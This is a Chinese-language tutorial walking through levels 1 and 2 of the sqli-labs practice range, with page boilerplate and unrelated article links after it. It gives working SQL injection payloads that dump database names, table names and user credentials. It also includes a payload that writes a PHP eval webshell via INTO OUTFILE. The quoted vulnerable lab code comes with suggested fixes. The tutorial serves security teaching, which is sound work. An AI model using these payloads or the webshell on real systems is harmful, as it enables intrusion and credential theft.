SQLi靶场

news2024/11/18 11:29:51

SQLi靶场 less1- less2 (详细讲解)

less 1 Error Based-String (字符类型注入)

思路分析

判断是否存在SQL注入

image-20231020135348600

已知参数名为id,输入数值 单引号‘’ 双引号来判断,它是数值类型还是字符类型

首先输入 1

image-20231020140025302

发现能能正常显示,使用四则运算进一步测试。

image-20231020140128900

输入?id=4-3 发现内容有变化,判断不是数值类型SQL,继续测试字符型输入单引号

image-20231020141941459

在经过URL编码后显示为%27,发现页面出现报错信息。初步判断可能是字符型SQL语句输入两个单引号查看是否能闭合语句.

image-20231020141135258

页面有明显变化,报错信息消失,返回空信息,判断为字符型SQL注入,构造字符类型永真语句,继续测试。

image-20231020141354961

?id=' or 1=1 --+    

%27 为 单引号 URL编码, %20 为 空格 URL编码

输入字符永真POC后,回显一条数据,但是并没有爆出该字段所有信息,后端应该对此做了限制。

注入攻击

知识回顾

先了解攻击需要使用的一些函数以及mysql系统表:

order by

在SQL语法中,用于排序,SQL注入攻击中可以用于爆破字段数量

union

在SQL语法中,用于联合查询,SQL注入攻击中可用于爆破特殊信息

database()

用于返回当前正在使用的数据库的名称。

version()

用于返回当前MySQL服务器的版本号。

concat()

用于将多个字符串连接在一起。

group_concat()

将多个列连在一起

information_schema

该表为mysql的系统默认表,其中包含了关于MySQL服务器和数据库的元数据信息。这个数据库不存储用户数据,而是存储关于数据库架构、表、列、索引等信息的数据。

  1. information_schema.tables:这个表存储了有关所有数据库中的表的信息,包括表名、数据库名、表的类型(如表、视图等)、表的引擎(如InnoDB、MyISAM等)、创建时间、更新时间等。
  2. information_schema.columns:这个表包含了有关所有表中列(字段)的信息,包括列名、列的数据类型、是否为主键、是否允许 NULL 值等。
  3. information_schema.schemata:这个表列出了所有数据库的信息,包括数据库名、默认字符集、默认排序规则等。
  4. information_schema.routines:这个表包含有关存储过程和函数的信息,包括它们的名称、类型、定义等。
  5. information_schema.views:这个表包含有关视图(虚拟表)的信息,包括视图名、所属数据库等。
  6. information_schema.key_column_usage:这个表包含了关于表的外键的信息,包括外键名、所属表、所引用的表等。
  7. information_schema.table_constraints:这个表包含了有关表的约束(如主键、唯一约束等)的信息。
使用order by爆破 SELECT语句中的字段数量
?id= ' order by 4 --+  //poc

image-20231020143843414

报错字段数量,将数值继续向小的改

image-20231020144054600

数值 改成 3,发现页面变化,并没有报错,回显一个空表单,这是因为,前段查询语句是查了一个空语句,所以返回空表,查询语句如下

SELECT * FROM tables_name WHERE id='' order by 3
使用union获取用户数据、当前数据库名、版本信息

以知 原始查询语句的字段数为3,使用union来构造一个POC判断我们获取的字符数是否正确。

?id=' union SELECT 1,2,3 --+

image-20231020145651396

从中发现,回显正确,并显示我们查询了的内容,但是第一个字段好像被隐藏了,第二个、第三个字段都成功回显。

进一步爆破出用户名、当前数据库名。构造POC:

?id=' union SELECT 1,user(),database() --+

image-20231020150135017

爆破成功,这里有一点需要注意,在闭合第一个引号的时候,内部一定不要使用真值(能真实查询到的数据),因为这里系统会把默认查询到的第一行数据,优先显示到页面,在后面的源码分析中,在仔细研究其中原理。例如下面这个例子:

image-20231020150535633

我把闭合的单引号,放入了真值,直接回显了这个真值查询的数据。

爆破数据库表和列名

使用mysql的系统表information_schema来波破改数据库中已存的表名和列名。

?id=' UNION select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

image-20231020152015364

这个POC ,主要是从 information_schema.tables 表中选择了 security 数据库中的表名,并使用 GROUP_CONCAT 将它们连接成一个字符串。

然而我们可以继续对这个POC进行改造,

?id='union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

image-20231020153424846

这个POC,就获取了information_schema.colunms中所有的table_name为users的所有字段

根据这个POC返回的信息,在进一步的构造POC,就能拿到敏感数据,

?id=' UNION SELECT 1,group_concat(username,ID,password),3 from users--+

image-20231020154514217

这样就已经完成了一次成功的SQL注入,并获取了敏感信息。

思路总结

在学习SQL注入时,要对SQL的语法有大致上的了解,并且越熟练越好,在进行注入前要仔细分析,它使用的什么类型的SQL语句,以便对症下药,确定类型后,如果是查询类的注入,还要去分析出源语句中,使用了几个字段,当掌握这些信息后,就开始考虑如何闭合语句。基本流程如下:

  1. 判断SQL语句类型
  2. 构造永真POC判断是否存在SQL注入
  3. 爆破源语句字段数量
  4. 爆破成功后即可进行攻击

源码分析

<?php
include("../sql-connections/sql-connect.php");
//包含上级目录的用于数据链接的php代码
error_reporting(0);
//这行代码关闭了PHP错误报告,这意味着即使代码中有错误,也不会在网页上显示错误消息。

if(isset($_GET['id']))
// 判断是否获取到GET的参数,接收到参数执行以下语句,未接收到执行报错
{
$id=$_GET['id'];
//将GET传递的参数赋值给$id
$fp=fopen('result.txt','a');
//打开一个文件result.txt以用于记录。 'a' 参数表示以追加模式打开文件,如果文件不存在,将创建一个新文件。
fwrite($fp,'ID:'.$id."\n");
// 向$fp文件内写入数据,ID 和$id的字符串拼接    
fclose($fp);
// 释放文件资源




$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
//创建一个字符串变量,存储一条SQL查询语句,并把 $id 作为参数传入到语句的WHERE参数中
$result=mysql_query($sql);
//使用 $result 来接收 mysql_query($sql)函数查询的结果
$row = mysql_fetch_array($result);
// $row是一个数组变量,它使用mysql_fetch_array()来取出SQL查询结果的每一行数据

	if($row)
    //判断$row 中是否有数据,有数据则执行以下语句,没数据则执行sql报错信息
	{
  	echo "<font size='5' color= '#99FF00'>";
    //CSS样式
  	echo 'Your Login name:'. $row['username'];
    //$row数组中的 username 值
  	echo "<br>";
    //换行
  	echo 'Your Password:' .$row['password'];
    //$row数组中 password 值
  	echo "</font>";
    // css样式结束标记
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

分析该源码我发现以下问题:

  1. 在第7行使用GET方法传入的参数没有任何验证。

    • 解决办法 :对用户输出数据进行验证,并转变为需要处理的类型

    • if (isset($_GET['id']) && is_numeric($_GET['id'])) {
          //判断GET方法传入的参数是否是正确的类型
        $id = (int)$_GET['id'];
        // 确定为正确的类型在后端继续对该值再度进行转换操作
      } else {
        echo "请输入一个正确的数值.";
      }
      
  2. 在46行,使用了mysql_error() 来回显SQL的报错信息。

    • 解决办法:sql的报错信息不能暴露,应该保存在后台,前端的报错应该由管理员自己定义。

    • else {
        echo "发生错误。请稍后重试。";
        error_log(mysql_error()); // 记录错误信息到日志文件
      }
      

这里是我的才疏学浅,只能加了简单验证,但是这个验证逻辑是越复杂越好,根据实际情况去编写即可。

在之前说的在本关卡中,每次只能显示一行的数据,这是因为mysql_fetch_array()这个函数, 函数的作用是从结果集中获取一行数据,并将该数据存储在数组中,因此每次调用它都会获取一行数据。这是为了逐行处理查询结果。如果要在前段显示全部内容,就一定要在加上一个循环去打印渲染每一条语句。

less 2 Error based - Intiger based (数值类型注入)

思路分析

image-20231020161629627

判断SQL类型
一、输入数值1和四则运算判断它是不是数值类型:

输入1页面由变化,回显id=1的数据。

image-20231020161816513

输入数值四则运算4-3,查看返回结果,回显结果无变化,由此判断为数值类型SQL语句,

二、使用永真POC,进行判断是否存在SQL注入。
?id=-1 or 1=1

image-20231020162305465

输入语句后,页面没变化,无报错,该字段的值也没有全部爆出,判断大概率使用了mysql_fetch_array()函数。

OR逻辑运算符的优先级是最低的,AND逻辑运算符优先级比OR高,而NOT的逻辑运算符的优先级是最高的。

在SQL语句中 OR运算符有一个特性,当第一个条件为真时,第二个条件默认不在执行。

这是因为在这种情况下,整个 OR 表达式已经被确定为真,无论第二个条件的值如何,都不会改变整个表达式的结果。这种短路逻辑有助于提高查询性能,因为不必评估多余的条件。

三、使用ORDER BY 判断源语句字段数量
?id=-1 ORDER BY 4 #

ORDER BY 的值是4 报错了,源语句中的字段数量要少于4

image-20231020163556841

当数值是3,因为这是一条正常的语句 所以回显了id=1的数据,这代表这 SQL语句是正确的,源语句的字段数应该就是3个。

?id=1 ORDER BY 3 #

image-20231020163851340

四、使用UNION 确定字段数量
?id=-1 UNION SELECT 1,2,3 --+

在这一步需要将id的值设为假,以便测试,每个字段存在的位置。

image-20231020164359173

确定无问题,准备注入攻击。

注入攻击
一、获取用户名user()、数据库名database()
?id=-1 UNION SELECT 1,user(),database() --+

image-20231020164604218

二、使用Mysqlinformation_schema库,获取更多信息
获取数据库中的所有表名:
?id=-1 UNION SELECT 1,group_concat(table_name),database() FROM information_schema.tables WHERE table_schema=database() --+

在此处,我们使用database()替代了security,因为database()返回的值就是它。在SQL语句 函数的执行优先级高于其他语句,而且可以用于动态地获取一些信息。

image-20231020165348760

获取users中的所有字段名字:
?id=-1 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns WHERE table_name = 'users' --+

image-20231020170145024

从username、password中获取敏感信息
?id=-1 UNION SELECT 1,group_concat(username,id,password),version() from users --+

POC中 group_concat()函数中只用于隔断username和password,使得账号和密码显示的更为清楚。

image-20231020170719960

成功爆破,所有账号密码。

向数据库中注入webshell
?id=-1 UNION SELECT 1,'<?php @eval($POST[cmd]);?>',3 into outfile './web.php' --+

这个注入是有条件的,mysql数据库必须开启secure_file_priv,否则就会报错。

image-20231020171745057

secure_file_priv 是 MySQL 数据库服务器的配置选项之一,用于指定允许加载文件的安全目录。这个选项的目的是增强 MySQL 服务器的安全性,以限制用户在服务器上加载文件的位置,以防止潜在的安全风险。

具体来说,secure_file_priv 选项定义了一个目录路径,MySQL 服务器只允许用户在这个指定的目录或其子目录下加载文件。这意味着用户不能在不被允许的目录中执行文件加载操作。这有助于防止恶意用户滥用文件加载功能,执行危险的操作或访问敏感文件。

修改 my.cnf 文件,在 [mysqld] 块下,如果没有 secure_file_priv 则新增

指定目录:secure_file_priv=/path/to/data

不限目录:secure_file_priv=

禁止操作:secure_file_priv=NULL

测试需求,我们直接添加一个不限制目录的配置继续测试。

image-20231020172301959

开启secure_file_priv后重启数据库,继续测试

image-20231020172635837

发现页面错误消失了,由于我们并没有查询任何内容,所以返回空表,在测试我们的webshell有没有成功上传!

./代表本级目录,而在这里则表示上传到mysql的本级目录,它不在sqli靶场的目录,又因为跨源的问题,也没有文件包含漏洞,我们不能直接利用

image-20231020175302775

再次为了演示,就直接在注入一个webshell到sqli靶场目录中 进行测试。

?id=-1 UNION SELECT 1,'<?php phpinfo();?>',3 into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php' --+

这里还要强调以下,在MySQL中,单独以个\都被会认为是一个转义字符,所以我们要对这个\ 在做一次转义 ,在加上一个\就ok了

image-20231020180202384

在MySQL中,INTO OUTFILE 是用于将查询结果写入文件的操作。它是在SELECT语句中使用的一种扩展。

这是操作的一般执行顺序:

  1. SELECT:首先,执行SELECT语句以获取结果集。
  2. INTO OUTFILE:然后,将结果集中的数据写入指定的文件,使用INTO OUTFILE子句。这个子句告诉MySQL将查询结果写入到一个文件中,该文件由路径和文件名指定。
SELECT 1,'<?php phpinfo();?>',3 INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php'

这个查询选择了三个值(1、‘<?php phpinfo();?>’、3)并将它们写入了 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php' 这个文件中。

思路总结

在这一关总体思路与第一关基本一致,只不过在本关中使用的是数值内省SQL语句,在闭合语句方面不用考虑引号等关系。

介绍了mysql的一个安全配置项secure_file_priv,它是用来控制文件加载目的选项,在没有特殊要求的情况下,建议关闭该功能。

源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);


// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>

本关的源码与第一关基本一致,唯一不同的点就是在 SQL语句中没有给变量$id引号。思路会院借鉴第一关的思路。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1129433.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

IDEA在GitHub / Gitee中拉取特定一个分支代码方法

IDEA通过HTTP / SSH拉取项目的时候&#xff0c;默认都是拉取master分支的节点代码&#xff0c;对于我们通过分支来逐一消化项目的需求是相违背的&#xff0c;那么下面就是如何对一个项目特定分支读取方法 首先正常通过HTTP / SSH拉一个项目下来 打开分支列表&#xff0c;选择指…

一文了解GC垃圾回收

一文了解GC垃圾回收 1 判断一个对象为垃圾对象的方法 引用计数法(弃用) 可达性分析算法 是否有指向GC root 的引用链&#xff0c;如果有&#xff0c;不是垃圾对象 ---->GC roo:即rt.jar包中内容 2 内存泄漏与内存溢出区别 泄漏&#xff1a;原本需要被回收的对象&#…

Python 深度学习入门之CNN

CNN 前言一、CNN简介1、简介2、结构 二、CNN简介1、输出层2、卷积层3、池化层4、全连接层5、输出层 前言 1024快乐&#xff01;1024快乐&#xff01;今天开新坑&#xff0c;学点深度学习相关的&#xff0c;说下比较火的CNN。 一、CNN简介 1、简介 CNN的全称是Convolutiona…

英语——语法——从句——名词性从句——笔记

文章目录 名词性从句一、定义二、分类&#xff08;一&#xff09;宾语从句&#xff08;二&#xff09;主语从句&#xff08;三&#xff09;C同位语从句&#xff08;四&#xff09;D表语从句 名词性从句 一、句子成分 简而言之&#xff0c;构成一个句子的成分&#xff08;或要素…

关于 provide、inject 在Vue3中的用法

Vue3关于 provide、inject 的用法 一、传递变量/数据二、传递函数 前言&#xff1a; 在父子组件传递数据时&#xff0c;通常使用的是 props 和 emit。 父传子时&#xff0c;使用的是 props&#xff0c;如果是父组件传孙组件时&#xff0c;就需要先传给子组件&#xff0c;子组件…

STM32:TTL串口调试

一.TTL串口概要 TTL只需要两个线就可以完成两个设备之间的双向通信&#xff0c;一个发送电平的I/O称之为TX&#xff0c;与另一个设备的接收I/O口RX相互连接。两设备之间还需要连接地线(GND)&#xff0c;这样两设备就有相同的0V参考电势。 二.TTL串口调试 实现电脑通过STM32发送…

高等数学啃书汇总重难点(六)定积分的应用

无论是考研还是学校期末考试&#xff0c;这一部分的内容都不会太难&#xff0c;因此今天的内容一页笔记就足够放的下了。 重点在于理解所谓的元素法——也就是微元法&#xff0c;即定积分的几何意义。只不过&#xff0c;定积分几何意义的引例为平面问题&#xff0c;实际上&…

Spring初步了解到深入理解

文章目录 1.Spring1.1简介1.2优点1.3组成1.4拓展 2.IOC理论推导3.Hello Spring下面牵扯到的地址: 4.IOC创建对象的方式1.使用无参构造创建对象&#xff0c;默认2.假设我们要使用有参构造创建对象1.下标赋值2.类型3.参数名 5.Spring配置5.1别名5.2bean的配置5.3import 6.依赖注入…

Monocular arbitrary moving object discovery and segmentation 代码复现

环境 https://github.com/michalneoral/Raptor 1.创建environment.yaml name: raptor channels:- pytorch- conda-forge dependencies:- python3.8- pytorch1.9.0- torchvision0.10.0- cudatoolkit11.1- pipconda env create -f environment.yaml conda activate raptor2.安…

C++基类和派生类的内存分配,多态的实现

目录 基类和派生类的内存分配基类和派生类的成员归属多态的实现 基类和派生类的内存分配 类包括成员变量&#xff08;data member&#xff09;和成员函数&#xff08;member function&#xff09;。 成员变量分为静态数据&#xff08;static data&#xff09;和非静态数据&…

技术分享 | 针对蜜罐反制Goby背后的故事

0x01 概述 近期我们联动FORadar做了一个插件&#xff0c;实现了从企业名称->企业漏洞的全自动检测流程&#xff0c;在做具体实践的时候碰到了两个很有意思的蜜罐&#xff0c;其中一个蜜罐内置了Weblogic漏洞&#xff0c;同时配置有专门针对旧版本Goby反制Payload&#xff0…

点亮现代编程语言的男人——C语言/UNIX之父Dennis Ritchie

祝各位程序员们1024程序员节快乐&#x1f389;&#x1f389;&#x1f389; 图片来自网络&#xff0c;侵删 前言 在程序员中&#xff0c;有一位人物的不被人熟知&#xff0c;他的贡献甚至比他自身更要出名 C语言之父&#xff0c;UNIX之父——Dennis MacAlistair Ritchie 一…

0基础学习PyFlink——使用Table API实现SQL功能

在《0基础学习PyFlink——使用PyFlink的Sink将结果输出到Mysql》一文中&#xff0c;我们讲到如何通过定义Souce、Sink和Execute三个SQL&#xff0c;来实现数据读取、清洗、计算和入库。 如下图所示SQL是最高层级的抽象&#xff0c;在它之下是Table API。本文我们会将例子中的SQ…

【机器学习合集】深度学习模型优化方法最优化问题合集 ->(个人学习记录笔记)

文章目录 最优化1. 最优化目标1.1 凸函数&凹函数1.2 鞍点1.3 学习率 2. 常见的深度学习模型优化方法2.1 随机梯度下降法2.2 动量法(Momentum)2.3 Nesterov accelerated gradient法(NAG)2.4 Adagrad法2.5 Adadelta与Rmsprop法2.6 Adam法2.7 Adam算法的改进 3. SGD的改进算法…

LVS+keepalived高可用集群

1、定义 keepalived为lvs应运而生的高可用服务。lvs的调度器无法做高可用&#xff0c;keepalived实现的是调度器的高可用&#xff0c;但keepalived不只为lvs集群服务的&#xff0c;也可以做其他代理服务器的高可用&#xff0c;比如nginxkeepalived也可实现高可用&#xff08;重…

解密Kubernetes:探索开源容器编排工具的内核

&#x1f90d; 前端开发工程师&#xff08;主业&#xff09;、技术博主&#xff08;副业&#xff09;、已过CET6 &#x1f368; 阿珊和她的猫_CSDN个人主页 &#x1f560; 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 &#x1f35a; 蓝桥云课签约作者、已在蓝桥云…

zabbix6.0 部署配置

架构 先简单介绍zabbix监控的最主要的两个组件&#xff1a; zabbix server zabbix agent server 用来部署 web console以及相关的数据存储&#xff0c;所以需要配合一些数据库来保存数据&#xff0c;比如mysql,pgsql, 又有前端的页面所以还需要配置 nginx 和getway 所以 serve…

【makedown使用介绍】

如何使用makedown 欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必…

计算机网络【CN】IPV4报文格式

版本&#xff08;4bit&#xff09;&#xff1a;IPV4/IPV6首部长度&#xff08;4bit&#xff09;&#xff1a;标识首部的长度 单位是4B最小为&#xff1a;20B最大为&#xff1a;60&#xff08;15*4&#xff09;B总长度&#xff08;16bit&#xff09;&#xff1a;整个数据报&…

目录遍历漏洞

漏洞挖掘之目录遍历漏洞 (baidu.com) 从0到1完全掌握目录遍历漏洞 0x01 什么是目录遍历漏洞 目录遍历漏洞是由于网站存在配置缺陷&#xff0c;导致网站目录可以被任意浏览&#xff0c;这会导致网站很多隐私文件与目录泄露。 比如数据库备份文件、配置文件等&#xff0c;攻击…